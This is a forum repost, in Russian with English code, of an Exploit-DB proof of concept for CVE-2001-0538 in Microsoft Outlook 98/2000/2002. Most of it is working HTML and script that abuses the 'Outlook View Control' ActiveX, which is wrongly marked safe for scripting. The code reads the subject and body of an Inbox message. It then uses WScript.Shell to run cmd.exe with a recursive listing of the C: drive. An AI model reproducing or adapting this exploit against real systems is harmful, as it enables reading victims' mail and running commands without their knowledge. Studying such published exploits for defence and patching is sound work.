Exploit Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21004
Проверка EDB
  1. Пройдено
Автор
GEORGI GUNINSKI
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2001-0538
Дата публикации
2001-07-12
Код:
source: https://www.securityfocus.com/bid/3026/info

Microsoft Outlook introduces a vulnerability that may allow attackers to execute arbitrary commands on a target system.

The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts.

Scripts can execute commands without user knowledge or consent. 

This assumes you have at least one message in Outlook XP's Inbox
<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>

<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();

vv2=vv1.Session.Application.CreateObject("WScript.Shell");

alert("Much more fun is possible");


vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");

}
setTimeout("f()",2000);
</script>
 
Источник
www.exploit-db.com

Похожие темы